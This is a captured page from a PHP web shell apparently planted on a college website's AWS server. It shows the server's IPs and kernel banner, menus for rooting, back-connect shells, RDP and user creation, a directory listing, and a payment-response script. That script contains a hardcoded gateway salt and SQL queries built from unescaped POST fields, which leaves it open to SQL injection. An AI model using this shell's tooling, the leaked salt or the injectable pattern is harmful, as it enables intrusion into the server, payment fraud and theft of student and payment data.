Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.140.185.250
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
bnu /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
captcha
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
phpmailer
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
CollegeMainPage.php
2.18
KB
-rwxr-xr-x
admin_login.php
6.38
KB
-rwxr-xr-x
app.php
783
B
-rwxr-xr-x
cconfig.php
1.21
KB
-rwxr-xr-x
cconfig_old.php
1.15
KB
-rwxr-xr-x
college_login.php
6.91
KB
-rwxr-xr-x
home.html
15.76
KB
-rwxr-xr-x
home_admin.html
7.13
KB
-rwxr-xr-x
home_college.html
5.98
KB
-rwxr-xr-x
homeold.html
12.31
KB
-rwxr-xr-x
index.php
2.18
KB
-rwxr-xr-x
indexold.html
7.14
KB
-rwxr-xr-x
indexstop.php
2.33
KB
-rwxr-xr-x
payment_gate_way_responce.php
2.64
KB
-rwxr-xr-x
payment_gateway.php
7.62
KB
-rwxr-xr-x
pgResponse.php
4.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : payment_gate_way_responce.php
<?php require_once("links/header.php"); ?> <div class="page-container" style='margin-top:111px;'> <!-- BEGIN CONTENT --> <div class="page-content-wrapper"> <div class="page-content"> <?php require_once(dirname(__FILE__)."/cconfig.php"); ini_set("display_errors","On"); error_reporting(E_ALL ^ E_NOTICE^ E_WARNING); require_once("cconfig.php"); $aobj_context=CConfig::CreateNewDbContext(); $status=$_POST["status"]; $firstname=$_POST["firstname"]; $amount=$_POST["amount"]; $txnid=$_POST["txnid"]; $posted_hash=$_POST["hash"]; $key=$_POST["key"]; $productinfo=$_POST["productinfo"]; $email=$_POST["email"]; $salt = "6nUQgBjF"; $remarks=""; foreach($_POST as $ak=>$av) { $remarks.="{$ak} => ".addslashes($av)." \n"; } $update="update dctran set FPAYREMARKS='{$remarks}', FPAYSTATUS='{$status}',FPAYDATE=now(),FTRANID='{$txnid}' where FAPPNO='{$productinfo}'"; $lobj_update = $aobj_context->mobj_db->Execute($update); If(isset($_POST["additionalCharges"])) { $additionalCharges=$_POST["additionalCharges"]; $retHashSeq = $additionalCharges.'|'.$salt.'|'.$status.'|||||||||||'.$email.'|'.$firstname.'|'.$productinfo.'|'.$amount.'|'.$txnid.'|'.$key; } else { $retHashSeq = $salt.'|'.$status.'|||||||||||'.$email.'|'.$firstname.'|'.$productinfo.'|'.$amount.'|'.$txnid.'|'.$key; } $hash = hash("sha512", $retHashSeq); if ($hash != $posted_hash) { echo "<h1 style='color:red;'>Invalid Transaction. Please try again"; } else { $get_data=" select femail, fmobile,fpaystatus from dctran where FAPPNO ='{$productinfo}' limit 1"; $lobj_get_data=$aobj_context->mobj_db->GetRow($get_data); if($lobj_get_data[fpaystatus] == 'success') { echo " <div class='col-xs-9 center-block' style='float:none;margi:0 auto;'> <h1 style='color:green;'>Thank You. Your payment status is ". $status ."</h1>"; echo "<h2>Your Transaction ID for this transaction is ".$txnid.".</h2>"; echo "<h3>We have received a payment of Rs. " . $amount ."</h3>"; $html='<button class="btn blue" onclick=\'CMS.PrintNETBANKCertifcate("'.$productinfo.'");\' type="button"><i class="fa fa-download"></i> Print Acknowledgement</button>'; $html.='</div> '; echo $html; } else { echo "<div id='table_left_div' style='background:#fff;'><div style='height:450px;'><h1 style='color:red;'>Transaction " .$lobj_get_data[fpaystatus]. " Please try again</h1></div></div>"; } } ?> <!-- PF Transfer out-Print Reports Popup Starts--> </div> </div> <!-- END CONTENT --> </div> <!-- END CONTAINER --> <?php require_once("links/footer.php"); ?>
Close